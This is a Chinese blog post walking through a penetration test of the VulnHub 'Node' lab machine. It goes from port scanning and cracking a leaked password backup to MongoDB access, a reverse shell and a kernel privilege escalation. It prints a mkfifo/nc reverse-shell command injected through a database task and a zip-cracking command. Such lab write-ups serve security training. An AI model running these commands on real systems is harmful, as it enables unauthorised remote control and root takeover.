渗透测试--vulhub-node

最新推荐文章于 2024-04-24 00:19:12 发布
原创 最新推荐文章于 2024-04-24 00:19:12 发布 · 3.2k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络 #安全 #linux

本文详细记录了一次渗透测试的过程,从下载并安装靶机环境开始,通过信息收集发现开放的端口和服务,利用JS源码审计获取敏感信息,解密数据,登录MongoDB数据库,再到利用内核漏洞进行提权。过程中涉及了nmap扫描、ARP-scan、代码审计、SSH连接、字典破解、MongoDB操作以及内核提权等多个环节,展示了完整的渗透测试流程。

文章目录

安装过程

首先去官网下载node,下载mirror版本

https://www.vulnhub.com/entry/node-1,252/

然后直接创建个文件夹,VMvare导入node。

配置网络:

在vm中的编辑一栏打开虚拟网络编辑器

image-20220315155434533

打开那个更改设置,添加一个网络

最后需要在nodekali配置一个网卡,记住都要配置一个。

image-20220315155537675

kaliifconfig命令,网络配置成功

image-20220315155919645

信息收集

arp-scan扫描,获取同一个网段的可打开的主机。

arp-scan 用来发现系统和指纹识别的命令行工具

image-20220315160341577

发现192.168.79.128192.168.79.254

ping一下,128的主机存活。

image-20220315160510689

使用nmap对端口进行探测,探测出来22,3000端口打开

image-20220315162134405

获取详细的banner信息,3000,端口有用

image-20220315162344765

访问3000端口

image-20220315162801947

该web界面使用node.js编写,通过审计js源码,在“assets/js/app/controllers/home.js”这个文件中可以获取到存储敏感信息的位置/api/users/latest/ ,访问该位置

使用hash-identifier判断加密方式,为SHA-256,如下图所示:

image-20220315164112909

网上找工具解码:

img

使用任意一个口令登录,登陆后如下图所示,但是没有其他的东西了。

image-20220315164607904

这里面说Only admin users have access to the control panel currently, but check back soon to test the standard user functionality!只有管理员用户才能访问这个界面,猜想应该还有另外的管理员帐号,直接访问/api/users/ 获取到了另外一个用户

image-20220315164418596解出该用户的密码(manchester)后,登录可以下载该网站的备份源码,如下图所示

image-20220315164819473

代码审计

下载备份,看到文件内容是base64加密

image-20220315193639096

对文件进行解码

使用base64 -d 解码输出一个文件内

base64 -d myplace.backup > myplace

将文件打开看了一下,是乱码,file看一下文件类型是zip压缩包image-20220315193951427

发现是个加密文件,需要先进行破解,可以使用kali自带工具fcrackzip进行破解zip加密文件,该工具支持暴力破解和字典猜解两种方式

fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt myplace.zip

参数描述
-D指定方式为字典猜解
-p指定猜解字典的路径
-u表示只显示破解出来的密码,其他错误的密码不显示出

image-20220315194159083

输入密码,解压出源代码

image-20220315195033394

发现很多目录,因为是nodejs,所有看下他的app.js

image-20210821180335719

看到了mongodb的账号和密码,也许可以登录

账户:mark      密码:5AYRft73VtFpc84k

登录服务器

利用ssh,进行远程登录mongodb

ssh:Secure Shell(安全外壳协议,简称SSH)是一种加密的网络传输协议,可在不安全的网络中为网络服务提供安全的传输环境。 SSH通过在网络中建立安全隧道来实现SSH客户端与服务器之间的连接。 SSH最常见的用途是远程登录系统,人们通常利用SSH来传输命令行界面和远程执行命令

形式:

ssh 用户名@服务器ip地址 -p 端口号

image-20220315200438931

登录成功。但当前用户(mark)没有root权限,需要进行提权操作

image-20220315200610579

也可以登录mongo数据库

1611502574_600d93ee2384f6b78a7c0.png!small?1611502574567

这儿可以执行命令

连接MongoDB,进去scheduler数据库

mongo -u mark -p 5AYRft73VtFpc84k scheduler

image-20220315205041094

反弹shell

db.tasks.insert({cmd:"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.79.129 888 >/tmp/f"});

image-20220315205147421

成功。

提权

一般提权都是内核提权,这儿我们先确定当前系统的内核版本和系统版本

image-20220315202109830

命令描述
lsb-release查看发行的系统版本信息
arch机器的体系架构

通过查看版本信息,使用searchsploit(漏洞查询工具) 查找,可以知道该内核版本存在漏洞可以直接提权,如下图所示

image-20220315202210011

有exp,我们使用scp命令(远程文件拷贝)将payload上传至靶机

scp /usr/share/exploitdb/exploits/linux/local/44298.c mark@192.168.79.128:/tmp/

image-20220315202253657

开始提权

image-20220315202441758

成功提权为root

总结:

  1. 会利用namp和arp-scan对端口和ip地址进行扫描
  2. 得到web页面,就类似于CTF题,找突破口
  3. 然后ssh远程连接数据库服务器
  4. 利用服务器内核漏洞进行提权

参考:

https://xz.aliyun.com/t/2695

Vulhub —— Node
战神/calmness的博客
12-25 458
目录 信息收集 查看页面源码 home.js latest 用户名密码 tom 账户 users 目录 进行登录下载备份文件 暴力破解压缩密码 解压文件 内核版本提权 信息收集 root@kali:~# nmap -Pn -A -p- 192.168.19.135 Starting Nmap 7.70 ( https://nmap.org ) at 2020-12-23 20:22 EST Nmap scan report for bogon (192.168.19...
[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce
qq_51577576的博客
10-02 2917
[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce 漏洞复现 ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。
Vulhub渗透测试 OSHAX
weixin_44687621的博客
08-23 350
下载靶机https://www.vulnhub.com/entry/hacknos-os-hax,389/ 导入到virtualbox后,将靶机网络改为仅主机模式,将usb2.0改成usb1.0 使用nmap扫描靶机ip 查看开放了哪些端口 查看端口详细信息 nmap -sS -sV -T5 -A 192.168.56.106 当前靶机开放了22和80端口,首先以80的web服务,尝试先获取webshell。 先查看一下主页,发现啥也没有,进行目录扫描。 访问img目录,发现目录下面有flaghos
Vulnhub靶机渗透测试——DC-1
Cobra的博客
04-12 2721
Vulnhub靶机渗透测试实战——DC-1 一、实验环境 攻击机(kali): 192.168.189.148 靶机(ubuntu): 192.168.189.172] 二、信息收集 1、使用nmap扫描进行主机发现 nmap 192.168.189.0/24 2、发现IP为192.168.189.172主机开放80和22等端口,访问其80端口 三、漏洞利用 1、发现该站点是由Drupal搭建,利用msf进行漏洞利用 use exploit/unix/webapp/drupal_drupalgedd
记录下对vulhub靶机jangow的一次渗透测试
weixin_52020240的博客
03-11 5733
靶机地址 https://www.vulnhub.com/entry/jangow-101,754/ 难度:简单 靶机IP:192.168.21.150 kali IP:192.168.21.129 目标:两个flag 信息收集 扫描靶机开放的端口: nmap -A -p- 192.168.21.149 发现开放21和80端口 访问80端口主页面可以跳转的页面buscar 点击之后跳转 输入命令试一下发现可以执行命令 对网站进行目录扫描 dirb或者gobus
渗透测试靶场容器vulhub
weixin_42489549的博客
06-09 507
Vulhub 是预先构建的易受攻击的 docker 环境的开源集合。不需要预先存在的 docker 知识,只需执行两个简单的命令,您就有一个易受攻击的环境。 安装 在 Ubuntu 20.04 上安装 docker/docker-compose: curl -s https://bootstrap.pypa.io/get-pip.py | python3 #安装最新版本 docker curl -s https://get.docker.com/ | sh #运行 docker service sys.
[ vulhub漏洞复现篇 ] Grafana任意文件读取漏洞CVE-2021-43798
qq_51577576的博客
09-02 2458
[ vulhub漏洞复现篇 ] Grafana任意文件读取漏洞CVE-2021-43798 Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。Grafana存在任意文件读取漏洞未授权的攻击者利用该漏洞,能够获取服务器敏感文件。...
[Vulhub] Struts2 S2-057 S2-059 S2-061 漏洞复现
weixin_45605352的博客
06-07 1797
Struts2 S2-057 RCE (CVE-2018-11776) 0x00 漏洞描述 Apache Struts是一个现在较为主流的开源框架,是用于使用Java编程语言开发Web应用程序。 定义XML配置时如果namespace值未设置且上层动作配置(Action Configuration)中未设置或用通配符namespace时可能会导致远程代码执行。 url标签未设置value和action值且上层动作未设置或用通配符namespace时可能会导致远程代码执行。 0x01 影响版本 Stru
『VulnHub系列』DC-1靶机渗透测试
qq_45300786的博客
11-29 647
0x00 前言 在开始之前我们需要知道的是, 靶机的ip获取方式是dhcp服务器来分配ip的,如果dhcp没有自动分配ip的话,请看我的置顶文章,解决没有ip的问题 而我的VMware就只有NAT模式可以使用dhcp服务器 那么接下来都将是NAT模式 工具、知识点和漏洞 nmap metasploit mysql 网站配置 hydra find命令 suid提权 配置环境 kali: 192.168.100.34 靶机DC-1: 192.168
渗透测试】VulnHub-W1R3S: 1
m0_52923241的博客
11-06 437
VulnHub-W1R3S: 1VulnHub-W1R3S: 1渗透测试详细流程小知识点必学工具curl:文件传输工具Nikto :web漏洞扫描神器john开膛手:密码破解工具 VulnHub-W1R3S: 1渗透测试详细流程 VulnHub-W1R3S: 1渗透测试详细流程 这台靶机可能是太简单了吧,打的是相当的顺利,相比之前要好很多,时间主要花费在两个小工具的学习上,这俩工具功能强大,但是以前没有接触过。再练~ 基本思路: 还是跟前几台靶机一样,先信息收集,nmap找ip,查端口,web页面查找有用信
vulnerable-node:一个用NodeJS编写的非常易受攻击的网站,目的是拥有一个已确定漏洞的项目,以测试安全分析器工具的质量
04-29
脆弱节点 脆弱节点:用NodeJS编写的非常脆弱的网站 代码名称 聚苯乙烯 版本 1.0 代码 问题 作者 丹尼尔·加西亚(cr0hn)-@ggdaniel 支持这个项目 通过应用Github的“赞助商”按钮来支持该项目(解决问题,新功能...)。 这是什么项目 该项目的目标是成为一个在NodeJS中具有真正易受攻击的代码的项目,而不是模拟的项目。 为什么? 像OWASP Node Goat这样的类似项目对于学习过程非常漂亮且有用,但对于真正的研究人员或研究源代码中的漏洞却没有作用,因为它们的代码并不是真正易受攻击,而是经过仿真的。 该项目的创建目的是为了拥有一个源代码中已确定漏洞的项目,最终可以测量安全分析器工具的质量。 尽管这不是其主要目标,但该项目还可用于: 渗透测试培训。 教学:学习如何在NodeJS中不进行编程。 该项目的目的是提供一个真实的应用程序,以在白盒
vulhub靶机THM-ContainMe-v4的渗透测试过程
weixin_52020240的博客
03-24 5077
靶机信息: kali:192.168.21.129 靶机:
VulnHub-Node
MRS_jianai的博客
03-25 356
VulnHub-Node靶机详细渗透教程
渗透测试环境搭建--Vulhub
a1b2c3是弱口令
12-08 5525
Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。 Docker安装(Ubuntu 16.04) # Install pip curl -s https://bootstrap.pypa.io/get-pip.py | python3 # Insta...
看完这篇 教你玩转渗透测试靶机Vulnhub——The Planets: Earth
Aluxian_的博客
07-08 1300
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。
VulnHub靶机 DC-8 打靶实战 详细渗透过程
最新发布
网络空间安全学习
04-24 3220
主机发现—端口扫描—服务探针—指纹识别—发现注入点—web渗透SQL注入—获取用户名密码—登入后台—发现可加载PHP代码输入PHP代码—反弹shell—提权—exim4漏洞利用。将其拷贝到本地,发现靶机有wget命令,那么可以通过wget进行下载,本地通过python开启一个http服务。访问web界面,通过上述信息收集加插件,得到以下信息,采用Drupal CMS,版本为Drupal 7。找到可代码执行的地方,或者可以输入代码的地方,尝试输入,保存即可。查看数据库当中的表信息,还有表中的内容。
Vulhub渗透测试环境搭建
Ciyaso的博客
04-22 1691
Vulhub渗透测试环境搭建 一.说明 Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。旨在让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身,Vulhub拥有大量靶场,包含了各种软件不同版本的漏洞,是学习漏洞复现的一个优质靶场 具体软件如下 二.安装Docker 1.安装pip curl -s https://bootstrap.pypa.io/get-pip.py | python3 2.安装最新版本的docker
[渗透测试实战]vulnhub靶场1 初步掌握渗透流程(详细步骤)
知识库总结、分享
07-01 3410
Fuzzing可以帮助发现那些常规的安全测试无法发现的漏洞和弱点,因为它可以测试系统的响应能力,以及处理异常数据的能力。目前已知系统提供的服务ssh和http,web用的是WordPress cms系统,渗透系统希望获得用户和密码,访问WordPress看能不能得到账户信息。拿到正确参数,需要传入参数访问url拿到系统信息,参数file是文件的意思,第一想到的是拿到系统的账户文件/etc/passwd,继续传参数访问。不报gcc相关的错误了,也算解决了一个问题,又出现了程序执行权限问题,真是大肠包小肠!
看完这篇 教你玩转渗透测试靶机vulnhub——Ai-Web1
热门推荐
Aluxian_的博客
04-26 1万+
Vulnhub靶机Web1渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:SQL注入: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 这是一个Web的漏洞靶机,老样子需要找到flag即可。 Vulnhub靶机下载: 官网地址:https://www.vulnhub.com/entry/a
Node-RED节点编写与部署详解
Node-RED是一款由IBM发起的开源流编辑器,它主要用于基于事件的编程,允许用户通过拖放界面快速连接硬件设备、API和在线服务。它的设计使得非开发者也能够轻松地编写代码,实现复杂的逻辑流程。 【标题】:"node-red...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值